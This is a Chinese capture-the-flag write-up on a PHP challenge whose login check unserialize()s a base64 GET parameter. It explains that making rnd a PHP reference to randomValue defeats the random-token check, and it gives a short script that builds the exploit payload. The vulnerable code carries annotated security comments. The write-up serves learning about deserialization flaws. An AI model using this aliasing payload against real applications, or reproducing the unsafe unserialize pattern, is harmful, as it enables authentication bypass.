进入目标网址得代码:
代码分析:
<?php
/**
 * Login check served by the challenge page: rebuilds a user record from a
 * serialized string and validates its username and a random token.
 *
 * SECURITY (review): the record is produced by unserialize() on
 * caller-supplied data, so its whole property layout, including PHP
 * references between properties, is decided by whoever sent the string.
 */
final class User
{
    /** @var mixed Value returned by unserialize(); the verify* methods read it as an object. */
    private $userData;

    /**
     * Deserializes the login attempt and keeps the result.
     *
     * @param mixed $loginAttempt Serialized PHP value handed to unserialize().
     * @throws InvalidArgumentException When unserialize() yields a falsy value.
     */
    public function __construct($loginAttempt)
    {
        // SECURITY: unserialize() runs on untrusted input with no
        // allowed_classes restriction. A data-only format such as JSON, or at
        // minimum an allowed_classes list, would narrow what a sender can
        // make this call instantiate.
        $this->userData = unserialize($loginAttempt);
        if ($this->userData) {
            return;
        }

        throw new InvalidArgumentException('Unable to reconstruct user data');
    }

    /**
     * Checks the username carried by the deserialized record.
     *
     * @return bool True only when username is exactly the expected string.
     */
    private function verifyUsername()
    {
        $expectedName = 'husectfer';

        return $expectedName === $this->userData->username;
    }

    /**
     * Draws a fresh random number and compares the record's rnd field to it.
     *
     * SECURITY (review): the expected number is written onto the same
     * deserialized object that supplies rnd. If rnd and randomValue are one
     * PHP reference, the assignment below updates both and the comparison is
     * true whatever random_int() returned. Holding the expected number in a
     * local variable, never on $this->userData, removes that dependency.
     *
     * @return bool True when (int) rnd equals the freshly drawn number.
     */
    private function verifyRandomVal()
    {
        $this->userData->randomValue = random_int(1e10, 1e11 - 1);
        $claimed = (int)$this->userData->rnd;

        return $claimed === $this->userData->randomValue;
    }

    /**
     * Runs the username check, then the random-token check.
     *
     * @return bool Always true when no exception is thrown.
     * @throws InvalidArgumentException When either check fails.
     */
    public function verify()
    {
        $nameOk = $this->verifyUsername();
        if (!$nameOk) {
            throw new InvalidArgumentException('Invalid username');
        }

        $tokenOk = $this->verifyRandomVal();
        if (!$tokenOk) {
            throw new InvalidArgumentException('Invalid random token value');
        }

        return true;
    }
}
// Request entry point of the challenge page.
// SECURITY (review): $_GET['var'] is attacker-controlled. After base64
// decoding it is passed straight to User's constructor, which unserialize()s
// it. Exceptions thrown by User are not caught here.
if (!isset($_GET['var'])) {
    // No login attempt supplied: show the page's own source.
    highlight_file("index.php");
} else {
    $var = base64_decode($_GET['var']);
    $user = new User($var);
    // The flag file is shown only after both checks in verify() pass.
    if ($user->verify()) {
        highlight_file("flag.php");
    }
}
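代码审计可知需要同时满足两个条件:username === 'husectfer',并且 rnd 与 randomValue 相等。
randomValue 是在校验时才由服务端重新随机赋值的,因此只有让 rnd 成为 randomValue 的引用,两者才会始终相等。根本原因在于服务端对不可信输入调用 unserialize(),并把用于比较的随机数写回了由输入还原出来的对象。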
构造代码
<?php
// Builds the serialized record, and its base64 form, that the write-up
// submits as the `var` request parameter.
// Defensive takeaway: the check is only satisfiable this way because the
// server stores the value it compares against inside data rebuilt from the
// request; a value kept outside the deserialized object cannot be aliased.
$x = array();
$x['username'] = "husectfer"; // the literal that verifyUsername() compares against
$x['randomValue'] = random_int(1e10, 1e11 - 1); // dead store: overwritten by the next line
$x['randomValue'] = 0;
$x['rnd'] = &$x['randomValue']; // bind rnd by reference to randomValue so the two always hold the same value
echo (serialize((object)$x)); // (object) casts the array to an object before serializing
// The second echo prints the base64 form directly after the first, with no separator.
echo base64_encode(serialize((object)$x));
?>
来源:freebuf.com 2021-06-27 19:37:27 by: 无名草talent
© 版权声明
文章版权归作者所有,未经允许请勿转载。